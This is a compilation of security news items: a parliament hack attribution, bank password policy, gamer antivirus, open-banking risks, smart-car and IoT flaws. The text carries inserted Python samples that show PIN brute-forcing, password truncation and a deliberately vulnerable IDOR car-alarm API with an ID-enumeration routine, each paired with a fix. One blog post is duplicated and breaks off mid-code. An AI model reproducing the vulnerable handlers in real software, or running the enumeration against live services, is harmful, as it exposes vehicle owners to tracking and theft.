Pentest secures contract with global technology corp, Xcina Consulting becomes preferred supplier

Shearwater Group, the organizational resilience group, announces that its group company, Pentest has secured a one-year contract with a global technology corporation worth in excess of US$1 million. At the same time, Xcina Consulting, another Shearwater group company has also signed a ‘Master Consulting Agreement’ and become a preferred supplier to the same organization. Under the terms of the contract, Pentest will deliver a framework for the provision of vulnerability assessment and penetration testing services … More

The post Pentest secures contract with global technology corp, Xcina Consulting becomes preferred supplier appeared first on Help Net Security.

Executive Director Q&A: PCI SSC Strategic Framework

In his keynote presentation at the 2019 PCI Community Meeting this week in Vancouver, Executive Director Lance Johnson introduced the Strategic Framework that is guiding PCI SSC activities to achieve its mission and support the needs of the global payments industry. In this interview, we cover key questions about the framework and how it’s shaping the Council’s priorities.

Australia is confident that China was behind attack on parliament, political parties

Australian intelligence is confident that China was behind the cyberattacks that hit its parliament and political parties, but the government decided not to accuse Beijing publicly.

According to Reuters, Australian intelligence has evidence that the attacks on its parliament and political parties were orchestrated by China. However, the Australian government decided not to publicly accuse China, in order to preserve trade relations with Beijing.

Reuters cited five sources within Australian intelligence who attributed the attacks on the national parliament and the three largest political parties, carried out before the general election in May, to China-linked hackers.

“Australia’s cyber intelligence agency – the Australian Signals Directorate (ASD) – concluded in March that China’s Ministry of State Security was responsible for the attack, the five people with direct knowledge of the findings of the investigation told Reuters.” Reuters reported.

“The report, which also included input from the Department of Foreign Affairs, recommended keeping the findings secret in order to avoid disrupting trade relations with Beijing, two of the people said.”

Australia disclosed the attacks in February. At the time, experts speculated that a nation-state actor was involved, without attributing the attacks to a specific threat actor.

China is Australia’s biggest trading partner, and it is not surprising that Beijing gathers intelligence on it. Beijing denied any involvement in the attacks, and China’s Foreign Ministry pointed out that China is itself the target of numerous attacks.

“When investigating and determining the nature of online incidents there must be full proof of the facts, otherwise it’s just creating rumors and smearing others, pinning labels on people indiscriminately. We would like to stress that China is also a victim of internet attacks,” the Ministry told Reuters.

“China hopes that Australia can meet China halfway, and do more to benefit mutual trust and cooperation between the two countries.”

When the Australian authorities discovered the attacks, IT staff forced a password reset for everyone working at the parliament.

According to information collected by Reuters, the hackers accessed private emails and policy papers from members of the Liberal, National and Labor parties.

Australian investigators shared their findings with the United States and the United Kingdom; the latter sent a team of cyber experts to Canberra to help investigate the attack.

“Australian investigators found the attacker used code and techniques known to have been used by China in the past, according to the two sources,” Reuters concludes.

Pierluigi Paganini

(SecurityAffairs – Australia, hacking)

The post Australia is confident that China was behind attack on parliament, political parties appeared first on Security Affairs.

Public WiFi Networks: Potential risks and how to work around them

Chances are that most people get excited when they see their device prompting to connect to public Wi-Fi when they visit a common area like a restaurant, cafe, an airport or even certain ...

The post Public WiFi Networks: Potential risks and how to work around them appeared first on HackingVision.

Banks, Arbitrary Password Restrictions and Why They Don’t Matter

Allow me to be controversial for a moment: arbitrary password restrictions on banks such as short max lengths and disallowed characters don't matter. Also, allow me to argue with myself for a moment: banks shouldn't have these restrictions in place anyway.

I want to put forward cases for both arguments here because seeing both sides is important. I want to help shed some light on why this practice happens and argue pragmatically both for and against. But firstly, let's just establish what's happening:

People are Upset About Arbitrary Restrictions

This is actually one of those long-in-draft blog posts I finally decided to finish after seeing this tweet earlier on in the week:

It feels wrong because 5 digits presents an extremely limited set of different possible combinations the password can be. (There's something a little off with the maths here though - 5 digits would only provide 100k permutations whereas 5 characters would provide more in the order of 1.5B.)

That said, Westpac down in Australia certainly appears to be 6 characters:

Which puts us well north of a billion possibilities again. Want more? CommBank will give you 16 characters:

On the one hand, it's a damn sight more generous than the previous two banks yet on the other hand, why? And while I'm here questioning CommBank's logic, what the hell is going on with this:

1Password has an open letter to banks on precisely this, because it's awful advice steeped in legacy misunderstandings of both technology and human brains. That open letter is often used as a reference to persuade banks to lift their game:

So on the surface of it, the whole thing looks like a bit of a mess. But it's not necessarily that bad, and here's why:

Password Limits on Banks Don't Matter

That very first tweet touched on the first reason why it doesn't matter: banks aggressively lock out accounts being brute forced. They have to because there's money at stake and once you have a financial motivator, the value of an account takeover goes up and consequently, so does the incentive to have a red hot go at it. Yes, a 5-digit PIN only gives you 100k attempts, but you're only allowed two mistakes. Arguably you could whittle that 100k "possibilities" down to a much smaller number of "likely" passwords either by recognising common patterns or finding previously used passwords by the intended victim, but as an attacker you're going to get very few bites at that cherry:
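To make the arithmetic in the paragraph above concrete, here is an added example (not code from the original post) that models a bank-style login with a five-digit PIN and a hard lock-out on the third wrong guess. The lock-out threshold, the PIN hashing, the customer IDs and the sample PINs are assumptions for illustration.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Dict, Tuple

PIN_SPACE = 10 ** 5   # five-digit PIN, as in the tweet the post discusses
MAX_FAILURES = 3      # assumption: two mistakes are tolerated, the third locks the account


def derive(pin: str, salt: bytes) -> bytes:
    # Never store the PIN itself; PBKDF2-HMAC-SHA256 from the standard library.
    return hashlib.pbkdf2_hmac("sha256", pin.encode("utf-8"), salt, 50_000)


@dataclass
class Account:
    salt: bytes
    digest: bytes
    failures: int = 0
    locked: bool = False


class PinAuthenticator:
    """Customer number + PIN check with a per-account failure counter and hard lock-out."""

    def __init__(self) -> None:
        self._accounts: Dict[str, Account] = {}

    def enrol(self, customer_id: str, pin: str) -> None:
        salt = os.urandom(16)
        self._accounts[customer_id] = Account(salt, derive(pin, salt))

    def login(self, customer_id: str, pin: str) -> str:
        """Returns "ok", "denied" or "locked"."""
        acct = self._accounts.get(customer_id)
        if acct is None:
            return "denied"          # same answer as a wrong PIN: no account enumeration
        if acct.locked:
            return "locked"          # a locked account rejects even the right PIN
        if hmac.compare_digest(acct.digest, derive(pin, acct.salt)):
            acct.failures = 0
            return "ok"
        acct.failures += 1
        if acct.failures >= MAX_FAILURES:
            acct.locked = True
            return "locked"
        return "denied"


def brute_force(auth: PinAuthenticator, customer_id: str) -> Tuple[bool, int]:
    """Try every PIN in order until the account opens or locks. Returns (found, attempts)."""
    attempts = 0
    for guess in range(PIN_SPACE):
        attempts += 1
        result = auth.login(customer_id, f"{guess:05d}")
        if result == "ok":
            return True, attempts
        if result == "locked":
            return False, attempts
    return False, attempts


def per_account_success_probability(keyspace: int = PIN_SPACE,
                                    attempts_before_lock: int = MAX_FAILURES) -> float:
    """Chance that a uniformly random PIN falls within the guesses allowed before lock-out."""
    return attempts_before_lock / keyspace


if __name__ == "__main__":
    auth = PinAuthenticator()
    auth.enrol("cust-0001", "04219")          # constructed sample account
    print(brute_force(auth, "cust-0001"))     # (False, 3): locked after three guesses
    print(auth.login("cust-0001", "04219"))   # "locked": the real owner is locked out too
    print(per_account_success_probability())  # 3e-05
```

The lock-out turns a 100k keyspace into three guesses per account, which is why the PIN length matters less than it first appears. The last call shows the flip side a practitioner has to plan for: anyone who knows a customer number can lock that customer out, so a control like this only works alongside a recovery path and the risk-based checks the post goes on to describe.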

Next up is the need to know the target's username. Banks typically use customer registration numbers as opposed to user-chosen usernames or email addresses so there goes the value in credential stuffing lists. That's not to say there aren't ways of discovering someone's banking username, but it's a significantly higher barrier to entry than the typical "spray and pray" account takeover attempts.

Then there's the authentication process itself, and it reminds me of a discussion I had with a bank's CISO during a recent workshop. I'd just spent two days with his dev team hacking themselves first and I raised the bollocking they were getting on social media due to a new password policy along the lines of those in the tweets you see above. He turned to me and said, "Do you really think the only thing the bank does to log people on is to check the username and password?" Banks are way more sophisticated than this and it goes well beyond merely string-matching credentials; there's all sorts of other environment, behavioural and heuristic patterns used to establish legitimacy. You won't ever see a bank telling you how they do it, but those "hidden security features" make a significant contribution to the bank's security posture:

Then there's the increasing propensity for banks to implement additional verification processes at key stages of managing your money. For example, one of the banks I regularly use sends me a challenge via SMS whenever setting up a new payee. Obviously, SMS has its own challenges, but what we're talking about now is not just needing to successfully authenticate to the bank, but also to prove control of a phone number at a key stage and that will always be more secure than authentication alone.

And if all of this fails? Banks like ING will give you your money back:

Now, compare all this to logging on to catforum.com:

How much sophistication do you think is behind those username and password fields in that vBulletin forum? Exactly, it's basic string-matching and this is really the point: judging banks by the same measures we judge basic authentication schemes is an apples and oranges comparison.

However, I disagree with banks taking this approach so let me now go and argue from the other side of the fence.

Banks Shouldn't Impose Password Limits

There are very few independent means by which we can assess a website's security posture in a non-invasive fashion. We can look for the padlock and the presence of HTTPS (which is increasingly ubiquitous anyway) and we look at the way in which they allow you to create and use passwords. There are few remaining measures of substance we can observe without starting to poke away at things.

So what opinion do you think people will form when they see arbitrary complexity rules or short limits? Not a very positive one and there are the inevitable conclusions drawn:

Hey [bank], does that 16 character limit mean you've got a varchar(16) column somewhere and you're storing passwords as plain text?

As much as I don't believe that's the case in any modern bank of significance, it's definitely not a good look. Inevitably the root cause in situations like this is "legacy" - there's some great hulking back-end banking solution the modern front-end needs to play nice with and the decisions of yesteryear are bubbling up to the surface. It's a reason, granted, but it's not a very good one for any organisation willing to make an investment to evolve things.

But beyond just the image problem, there's also a functional problem with arbitrarily low password limits:

I've been through this myself in the past and I vividly recall creating a new PayPal password with 1Password only to find the one in my password manager had been truncated on the PayPal side and I was now locked out of my account. This is just unnecessary friction.
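The truncation failure described above, as an added example that is not part of the original post: a sign-up path that silently cuts the password at 16 characters while the login path hashes the full string, beside a store that never alters the secret and, if a cap really must exist, rejects over-length input on both paths instead. The 16-character cap, the user names, the sample password and the PBKDF2 parameters are assumptions for illustration.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional, Tuple

MAX_LEN = 16  # the arbitrary cap the post questions; assumption: inherited from a legacy back end


def derive(password: str, salt: bytes) -> bytes:
    # PBKDF2-HMAC-SHA256 hashes the whole input; unlike bcrypt it has no 72-byte cut-off.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


class TruncatingStore:
    """The failure mode: sign-up silently truncates, login does not, so a
    password-manager-generated secret longer than MAX_LEN never verifies."""

    def __init__(self) -> None:
        self._records: Dict[str, Tuple[bytes, bytes]] = {}

    def register(self, user: str, password: str) -> None:
        salt = os.urandom(16)
        self._records[user] = (salt, derive(password[:MAX_LEN], salt))  # the bug: silent cut

    def verify(self, user: str, password: str) -> bool:
        salt, digest = self._records[user]
        return hmac.compare_digest(digest, derive(password, salt))


class ConsistentStore:
    """The fix: hash exactly what the user typed. If a maximum must be enforced,
    apply the same rule on both paths and reject loudly instead of altering the secret."""

    def __init__(self, max_len: Optional[int] = None) -> None:
        self.max_len = max_len
        self._records: Dict[str, Tuple[bytes, bytes]] = {}

    def _check_length(self, password: str) -> None:
        if self.max_len is not None and len(password) > self.max_len:
            raise ValueError(f"password exceeds {self.max_len} characters")

    def register(self, user: str, password: str) -> None:
        self._check_length(password)
        salt = os.urandom(16)
        self._records[user] = (salt, derive(password, salt))

    def verify(self, user: str, password: str) -> bool:
        self._check_length(password)
        salt, digest = self._records[user]
        return hmac.compare_digest(digest, derive(password, salt))


def demo(password: str = "correct horse battery staple") -> Tuple[bool, bool, bool]:
    """Register a 28-character password in both stores and try to log in with it.
    Returns (legacy login works, legacy login with only the first 16 chars works,
    fixed login works)."""
    legacy = TruncatingStore()
    legacy.register("alice", password)
    fixed = ConsistentStore()
    fixed.register("alice", password)
    return (legacy.verify("alice", password),
            legacy.verify("alice", password[:MAX_LEN]),
            fixed.verify("alice", password))


if __name__ == "__main__":
    print(demo())  # (False, True, True)
```

The middle value is the tell-tale symptom: the account opens with the first 16 characters and nothing else, which is exactly the lock-out a password manager user hits. The fix is the absence of any cut; a cap, if kept, is a validation error the user can see, never a silent edit of the secret.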

Summary

So wrapping it all up in reverse order, arbitrary low limits on length and character composition are bad. They look bad, they lead to negative speculation about security posture and they break tools like password managers.

But would I stop using a bank (as I've seen suggested in the past) solely due to their password policy? No, because authentication in this sector (and the other security controls that often accompany it) go far beyond just string-matching credentials.

Let's keep pushing banks to do better, but not lose our minds about it in the process.

YouTube’s fine and child safety online | Letters

Fining YouTube for targeting adverts at children as if they were adults shows progress is being made on both sides of the Atlantic, writes Steve Wood of the Information Commissioner’s Office

The conclusion of the Federal Trade Commission investigation into YouTube’s gathering of young people’s personal information (‘Woeful’ YouTube fine for child data breach, 5 September) shows progress is being made on both sides of the Atlantic towards a more children-friendly internet. The company was accused of treating younger users’ data in the same way it treats adult users’ data.

YouTube’s journey sounds similar to many other online services: it began targeting adults, found more and more children were using its service, and so continued to take commercial advantage of that. But the allegation is it didn’t treat those young people differently, gathering their data and using it to target content and adverts at them as though they were adult users.

Solving the Gamer’s Dilemma: Security vs. Performance

As of last year, 2.2 billion[1] people consider themselves gamers across the globe. Of that 2.2 billion, over 50% – 1.22 billion[2] – play their game of choice on a PC. The sheer number of PC gamers throughout the world, however, has sparked the interest of cybercriminals, and cyberthreats targeting gamers have spiked. Threats including malware, potentially unwanted programs (PUPs), phishing, account takeovers (ATO), and more have slowly started to permeate gamers’ domains at an alarming level.

PC gamers often adopt lesser security protocols, as they’re concerned about the potential negative impact on in-game performance. At the same time, they are the most connected, online users, meaning their exposure to threats is generally higher. While they recognize and understand the importance of having cybersecurity, they do not want to sacrifice performance for security. The gamer’s dilemma – security versus performance – is the crux as to why gamers put security second, even though the average gamer has experienced almost five cyberattacks.

There’s good news though – McAfee Gamer Security is here to counter the notion that antivirus slows gamers down. This brand-new security solution from McAfee provides gamers with the security they need without sacrificing performance or creating in-game slowdowns, such as drops in frames per second (FPS) and lag. Built from the ground up, this solution delivers performance optimization by monitoring key system metrics coupled with the ability to manually kill resource hogs on-the-fly, while automatically prioritizing resources and pausing background services. McAfee Gamer Security also features cloud-based MicroAV, which offloads detection from the system to the cloud for all the protection gamers could want or need, without the “bloat” that usually accompanies security software.

While McAfee Gamer Security is now available for purchase, in spring 2019 McAfee surveyed users that participated in beta testing. Here’s how they responded to a few questions we asked:

Overall, what impact, if any, did you feel in your gaming experience?

“I believe I had [experienced] a positive impact of the software during my overall use of the program because it increased the speed of my game as well as gave me peace of mind that I…[stayed] protected during my gameplay.”

What one benefit would make you talk about McAfee Gamer Security to your friends? What is the primary reason for your choice?

“Good security which doesn’t slow down my system; Normally, antiviruses…hog background resources [and] you trade performance for security. McAfee Gamer Security offers the best of both worlds, without contradicting each other.”

Overall, how useful or not useful has Gamer Security been?

“Every couple [of] hours or so while gaming, I…used the software to check up on my RAM/GPU/CPU performance and make sure my system isn’t bottlenecking, there aren’t any irregularities, etc. I also really like that I can experience a boost in my gameplay without having to take the risk of overclocking my components.”

In addition to using a security solution like McAfee Gamer Security, here are some other general tips to help you stay secure while playing your favorite video game:

  1. Ensure all applications, hardware and software are up-to-date. Cybercriminals can take advantage of software, hardware, and application vulnerabilities to spread cyberthreats, such as malware. Keep your devices and applications updated with the latest security patches and fixes to help combat this threat.
  2. Periodically review the programs installed on your device. Some apps on your device may be vampirically siphoning in-game performance. Remove apps that you do not need or no longer use.
  3. Create strong, unique passwords. Over 55% of gamers re-use the same password across accounts for online gaming services. And while it might be easier to remember the same password, reusing credentials across multiple accounts could put the hundreds, or even thousands, of invested hours in leveling up characters and gathering rare items at risk in the event one account is breached. Be sure to construct a complex password that is difficult to guess.

And, as always, stay on top of the latest consumer and gaming security threats with @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

Footnotes

  1. Number of active video gamers worldwide from 2014 to 2021 (in millions), Statista, 2019
  2. Number of active PC gamers worldwide from 2014 to 2021 (in millions), Statista, 2019

The post Solving the Gamer’s Dilemma: Security vs. Performance appeared first on McAfee Blogs.

New Banking Regs Increase Cyber-Attack Risk

A report released today by Trend Micro has found that new European open-banking rules could leave financial services organizations and their customers more susceptible to cyber-attacks.

The European Union’s Revised Payment Services Directive (PSD2) is designed to give users greater control over their financial data and the option to carry out open banking via a new breed of innovative fintech firms. According to Trend Micro's research, that increased control could come at a heavy cost. 

The new attack surface introduced by the EU's PSD2 includes public APIs that allow approved third parties to access users' banking data, and mobile apps that handle transactional data and could make their users targets for phishing attacks.

Another concern raised by the report pertained to financial technology (fintech) firms that have no record on data protection and lack the resources of big banks.

In a quick survey of open-banking fintechs, Trend Micro found them to have an average of 20 employees and no dedicated security professionals. The report suggests that such setups make these fintechs ideal targets for attackers and raise concerns over security gaps in their mobile apps, APIs, data-sharing techniques, and security modules that could be incorrectly implemented.

Bharat Mistry, principal security strategist at Trend Micro, told Infosecurity Magazine: "The worst-case scenario here is that cyber-criminals could very easily develop malicious fake apps, especially for mobile smartphone devices where the App Store provider hasn’t taken sufficient measures to validate the source of the application. Then, using phishing campaigns, hackers could direct users to download and use malicious apps, thereby exposing banking credentials to prying eyes."

Open banking comes with the additional challenge of how, and to whom, blame should be ascribed when cybercrimes do inevitably occur.

Mistry said: "Another aspect of this evolving open-banking world is the increasing complexity of proving responsibility when a fraudulent transaction occurs. The fault can potentially lie with the bank, the user, or the third-party provider; how smoothly will communication between these three parties go to resolve any such incident?"

Wherever the blame may lie, Mistry expects customers of financial services providers will expect their providers to shoulder the responsibility of maintaining cybersecurity. 

He said: "Cyber insurance is proving to be popular with organizations who want to offset their cyber liabilities; unfortunately, I cannot see individuals taking out such policies as most people are reluctant to pay for something that they think the service provider or bank should be taking care of."

Keeping Your Vehicle Secure Against Smart Car Hacks

An unfortunate reality of all smart devices is that, the smarter they get, and the more integrated into our lives they become, the more devastating a security breach can be. Smart cars are no exception. On the contrary, they come with their own specific set of vulnerabilities. Following high-profile incidents like the infamous Jeep hack, it’s more important than ever that smart car owners familiarize themselves with their inherent vulnerabilities. It may even save lives.

Smart Car Vulnerabilities

At a recent hacking competition, two competitors were able to exploit a flaw in the Tesla Model 3's browser and compromise the car's firmware. While the reported “Tesla hack” made waves in the industry, it isn't one of the most common vulnerabilities smart car owners should look out for. The following easier-to-exploit weaknesses are more relevant to the average owner.

Car alarms, particularly aftermarket car alarms, are one of the largest culprits in smart car security breaches. A recent study found that at least three million vehicles are currently at risk due to insecure smart alarms. By exploiting insecure direct object reference (IDOR) issues in the alarm's software, which lets an authenticated user act on any vehicle simply by supplying its identifier, hackers can track the vehicle's GPS location, disable the alarm, unlock doors, and in some cases even kill the engine while it is being driven.
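One way the IDOR class above plays out against an alarm vendor's API, as an added example that is not code from any real alarm product: a location and a disarm handler that trust the vehicle ID in the request, beside the same handlers checking that the authenticated user owns that vehicle, plus the sequential-ID walk an attacker with a single legitimate account would run. The vehicle records, user names, ID range and endpoint shape are constructed for illustration.

```python
from dataclasses import dataclass, replace
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class Vehicle:
    vehicle_id: int
    owner: str
    lat: float
    lon: float
    alarm_armed: bool


# Constructed sample data standing in for the alarm vendor's back-end records.
VEHICLES: Dict[int, Vehicle] = {
    1001: Vehicle(1001, "alice", 51.5074, -0.1278, True),
    1002: Vehicle(1002, "bob", 48.8566, 2.3522, True),
    1003: Vehicle(1003, "carol", 40.7128, -74.0060, False),
}


def locate_vulnerable(user: str, vehicle_id: int) -> Tuple[float, float]:
    """IDOR: the session proves who 'user' is, but the handler never checks that
    'user' owns vehicle_id, so any logged-in customer can track any car."""
    v = VEHICLES[vehicle_id]
    return (v.lat, v.lon)


def disarm_vulnerable(user: str, vehicle_id: int) -> bool:
    """Same flaw on a state-changing action: anyone can disarm anyone's alarm."""
    v = VEHICLES[vehicle_id]
    VEHICLES[vehicle_id] = replace(v, alarm_armed=False)
    return True


def _owned(user: str, vehicle_id: int) -> Vehicle:
    """Authorisation check shared by the fixed handlers."""
    v = VEHICLES.get(vehicle_id)
    if v is None or v.owner != user:
        # One answer for "no such car" and "not your car": nothing to enumerate.
        raise PermissionError("vehicle not found")
    return v


def locate_fixed(user: str, vehicle_id: int) -> Tuple[float, float]:
    v = _owned(user, vehicle_id)
    return (v.lat, v.lon)


def disarm_fixed(user: str, vehicle_id: int) -> bool:
    v = _owned(user, vehicle_id)
    VEHICLES[vehicle_id] = replace(v, alarm_armed=False)
    return True


def enumerate_ids(user: str, locate: Callable[[str, int], Tuple[float, float]],
                  id_range: range = range(1000, 1010)) -> List[int]:
    """What an attacker with one valid account reaches by walking sequential IDs."""
    reachable = []
    for vid in id_range:
        try:
            locate(user, vid)
            reachable.append(vid)
        except (KeyError, PermissionError):
            continue
    return reachable


if __name__ == "__main__":
    print(enumerate_ids("alice", locate_vulnerable))  # [1001, 1002, 1003]: every car in the fleet
    print(enumerate_ids("alice", locate_fixed))       # [1001]: only her own
```

The check that matters is the one in `_owned`: ownership is decided from the server-side record and the authenticated identity, never from anything the client sends, and a missing vehicle and someone else's vehicle return the same error so the ID space cannot be mapped.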

Key fobs are another route attackers use to gain physical access to a vehicle. In a relay attack, criminals use a pair of radio relays to extend the reach of a keyless-entry fob's signal, so the car believes the key is within range and unlocks (and in many cases starts). This high-tech version of a duplicate key comes with a decidedly low-tech mitigation: keeping the fob in a signal-blocking pouch, or simply wrapped in aluminium foil, stops its signal from being relayed while it is not in use.

On-board diagnostic ports have been legally required on all vehicles sold in the United States since 1996. Traditionally used by mechanics, the on-board diagnostics-II (OBD-II) port allows direct communication with your vehicle's computer. Because the port gives maintenance tools direct, unauthenticated access to the vehicle's internal networks, it is a particularly tempting entry point for anyone who can get physical access to the car.

Protecting Your Smart Car from a Cybersecurity Breach

Precautions should always be taken after buying a new smart device, and a smart car is no exception. Here are the best ways to protect your family from a smart car hack.

Update your car’s firmware and keep it that way. Do not skip an update because you don’t think it’s important or it will take too much time. Car manufacturers are constantly testing and updating vehicle software systems to keep their customers safe—and their brand name out of the news. Signing up for vehicle manufacturer recalls and software patches will help you stay on top of these updates.

Disable unused smart services. Any and all of your car’s connectivity ports that you do not use should be turned off, if not altogether disabled. This means that if you don’t use your car’s Bluetooth connectivity, deactivate it. Removing these access points will make your car less exposed to hacks.

Don’t be a beta tester. We all want the newest and hottest technologies, but that doesn’t keep us at our most secure. Make sure that you’re purchasing a vehicle with technology that has been field tested for a few years, allowing time for any vulnerabilities to be exposed. Cutting-edge technologies are good. But bleeding edge? Not so much.

Ask questions when buying your vehicle and don’t be afraid to get technical. Ask the dealer or manufacturer which systems can be operated remotely, which features are networked together, and how those gateways are secured. If you’re not comfortable with the answers, take your money elsewhere.

Advocate for your security. As smart cars become so smart that they begin to drive themselves, consumers must demand that manufacturers provide better security for autonomous and semi-autonomous vehicles.

Only use a trusted mechanic and be mindful of who you grant access to your car. OBD-II ports are vulnerable but necessary, so skipping the valet may save you a costly automotive headache down the line.

Keep the Conversation Going

As our cars get smarter, their vulnerabilities will change. Check back here to keep yourself updated on the newest trends in smart car technologies, and stay ahead of any potential threats.

The post Keeping Your Vehicle Secure Against Smart Car Hacks appeared first on Webroot Blog.

Vulnerabilities in IoT Devices Have Doubled Since 2013

A follow-up study into the security of IoT devices has revealed more than twice the number of vulnerabilities as were detected six years ago. 

In the 2013 study SOHOpelessly Broken 1.0, researchers at Independent Security Evaluators (ISE) highlighted 52 vulnerabilities across 13 SOHO wireless routers and network-attached storage (NAS) devices made by vendors including Asus and Belkin.

An examination of routers and NAS products by ISE published yesterday has flagged 125 CVE entries (Common Vulnerabilities and Exposures). The vulnerabilities captured by the new research, dubbed SOHOpelessly Broken 2.0, could affect millions of IoT devices.

For their latest study, ISE tested 13 contemporary IoT devices created by a range of manufacturers. Modern versions of several devices tested in the original 2013 study were also studied to determine whether manufacturers had upped their security game.

The results were fairly disappointing, with researchers able to obtain remote root-level access to 12 of the 13 devices tested. Among the weaknesses identified were buffer overflows, command injection flaws, and cross-site scripting (XSS) bugs.

"We were expecting to find issues in the devices; however, the number and severity of the issues exceeded those expectations. Our first reaction to a lot of our findings was: 'It can't really be this easy, right?'" said ISE researcher Joshua Meyer. 

Conducting the study has changed how Meyer uses IoT devices. He said: "I will be more selective of any IoT devices I purchase for personal use. I am also more aware of the features provided by my devices and disable all of the ones that aren't necessary to its security."

After completing the study, ISE sent vulnerability reports and proof-of-concept (PoC) code to the affected vendors. While the majority of companies acknowledged the reports, TOTOLINK and Buffalo have not yet responded.

"Netgear and Drobo only responded to us after we continuously messaged them about the critical security issues in their products," said Rick Ramgattie, lead researcher at ISE.

Asked if any plans were afoot for a SOHOpelessly Broken 3.0, Ramgattie said the team is looking into starting a new IoT/Embedded Device research project mid-2020.

Ramgattie elaborated: "We aren't sure if it is going to be the same format as SOHO 1.0 and SOHO 2.0. We might mix things up and pick a smaller set of manufacturers and narrow in on new attack surfaces we have been wanting to dive into for a long time. 

"We might also research more enterprise devices, different protocols, and more complex data-processing workflows."

Banks, Arbitrary Password Restrictions and Why They Don’t Matter

Banks, Arbitrary Password Restrictions and Why They Don't Matter

Allow me to be controversial for a moment: arbitrary password restrictions on banks such as short max lengths and disallowed characters don't matter. Also, allow me to argue with myself for a moment: banks shouldn't have these restrictions in place anyway.

I want to put forward cases for both arguments here because seeing both sides is important. I want to help shed some light on why this practice happens and argue pragmatically both for and against. But firstly, let's just establish what's happening:

People are Upset About Arbitrary Restrictions

This is actually one of those long-in-draft blog posts I finally decided to finish after seeing this tweet earlier on in the week:

It feels wrong because 5 digits presents an extremely limited set of different possible combinations the password can be. (There's something a little off with the maths here though - 5 digits would only provide 100k permutations whereas 5 characters would provide more in the order of 1.5B.)

That said, Westpac down in Australia certainly appears to be 6 characters:

Which puts us well north of a billion possibilities again. Want more? CommBank will give you 16 characters:

On the one hand, it's a damn sight more generous than the previous two banks yet on the other hand, why? And while I'm here questioning CommBank's logic, what the hell is going on with this:

Banks, Arbitrary Password Restrictions and Why They Don't Matter

1Password has an open letter to banks on precisely this because its awful advice steeped in legacy misunderstandings of both technology and human brains. That open letter is often used as a reference to persuade banks to lift their game:

So on the surface of it, the whole thing looks like a bit of a mess. But it's not necessarily that bad, and here's why:

Password Limits on Banks Don't Matter

That very first tweet touched on the first reason why it doesn't matter: banks aggressively lock out accounts being brute forced. They have to because there's money at stake and once you have a financial motivator, the value of an account takeover goes up and consequently, so does the incentive to have a red hot go at it. Yes, a 5-digit PIN only gives you 100k attempts, but you're only allowed two mistakes. Arguably you could whittle that 100k "possibilities" down to a much smaller number of "likely" passwords either by recognising common patterns or finding previously used passwords by the intended victim, but as an attacker you're going to get very few bites at that cherry:

Next up is the need to know the target's username. Banks typically use customer registration numbers as opposed to user-chosen usernames or email addresses so there goes the value in credential stuffing lists. That's not to say there aren't ways of discovering someone's banking username, but it's a significantly higher barrier to entry than the typical "spray and pray" account takeover attempts.

Then there's the authentication process itself and it reminds me of a discussion I had with a bank's CISO during a recent workshop. I'd just spent two days with his dev team hacking themselves first and I raised the bollocking they were getting on social media due a new password policy along the lines of those in the tweets you see above. He turned to me and said, "Do you really think the only thing the bank does to log people on is to check the username and password?" Banks are way more sophisticated than this and it goes well beyond merely string-matching credentials; there's all sorts of other environment, behavioural and heuristic patterns used to establish legitimacy. You won't ever see a bank telling you how they do it, but those "hidden security features" make a significant contribution to the bank's security posture:

Then there's the increasing propensity for banks to implement additional verification processes at key stages of managing your money. For example, one of the banks I regularly use sends me a challenge via SMS whenever setting up a new payee. Obviously, SMS has its own challenges, but what we're talking about now is not just needing to successfully authenticate to the bank, but also to prove control of a phone number at a key stage and that will always be more secure than authentication alone.

And if all of this fails? Banks like ING will give you your money back.

Now, compare all this to logging on to catforum.com.

How much sophistication do you think is behind those username and password fields in that vBulletin forum? Exactly, it's basic string-matching and this is really the point: judging banks by the same measures we judge basic authentication schemes is an apples and oranges comparison.

However, I disagree with banks taking this approach so let me now go and argue from the other side of the fence.

Banks Shouldn't Impose Password Limits

There are very few independent means by which we can assess a website's security posture in a non-invasive fashion. We can look for the padlock and the presence of HTTPS (which is increasingly ubiquitous anyway) and we look at the way in which they allow you to create and use passwords. There are few remaining measures of substance we can observe without starting to poke away at things.

So what opinion do you think people will form when they see arbitrary complexity rules or short limits? Not a very positive one and there are the inevitable conclusions drawn:

Hey [bank], does that 16 character limit mean you've got a varchar(16) column somewhere and you're storing passwords as plain text?

As much as I don't believe that's the case in any modern bank of significance, it's definitely not a good look. Inevitably the root cause in situations like this is "legacy" - there's some great hulking back-end banking solution the modern front-end needs to play nice with and the decisions of yesteryear are bubbling up to the surface. It's a reason, granted, but it's not a very good one for any organisation willing to make an investment to evolve things.

But beyond just the image problem, there's also a functional problem with arbitrarily low password limits.

I've been through this myself in the past and I vividly recall creating a new PayPal password with 1Password only to find the one in my password manager had been truncated on the PayPal side and I was now locked out of my account. This is just unnecessary friction.
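To make the functional problem concrete, here is an added Python example (not from the post): a legacy password-set path that silently truncates to a 16-character column limit, beside a hardened version that hashes the full password to a fixed-size digest and rejects over-length input explicitly. The user name, limits and password are constructed.

```python
import hashlib
import hmac
import os

LEGACY_COLUMN_LIMIT = 16     # the varchar(16)-style back-end limit speculated about above
MAX_PASSWORD_LENGTH = 1024   # generous, explicit ceiling for the hardened path (constructed)
PBKDF2_ROUNDS = 100_000


def _hash(password: str, salt: bytes) -> bytes:
    """Fixed 32-byte PBKDF2 digest, whatever the password length."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def verify(store: dict, user: str, password: str) -> bool:
    """Login path shared by both flows: hashes exactly what the user typed."""
    salt, digest = store[user]
    return hmac.compare_digest(_hash(password, salt), digest)


def legacy_set_password(store: dict, user: str, password: str) -> None:
    """Legacy flow: trims the password to the column width before hashing, so the
    password manager keeps the full value while the bank keeps only a prefix."""
    salt = os.urandom(16)
    store[user] = (salt, _hash(password[:LEGACY_COLUMN_LIMIT], salt))


class PasswordTooLong(ValueError):
    pass


def set_password(store: dict, user: str, password: str) -> None:
    """Hardened flow: never truncate silently; an over-length password is an explicit
    error, and the stored digest is fixed-size so no column limit constrains length."""
    if len(password) > MAX_PASSWORD_LENGTH:
        raise PasswordTooLong(f"password exceeds {MAX_PASSWORD_LENGTH} characters")
    salt = os.urandom(16)
    store[user] = (salt, _hash(password, salt))


def demo() -> dict:
    """Constructed walk-through: a 33-character generated password against both flows."""
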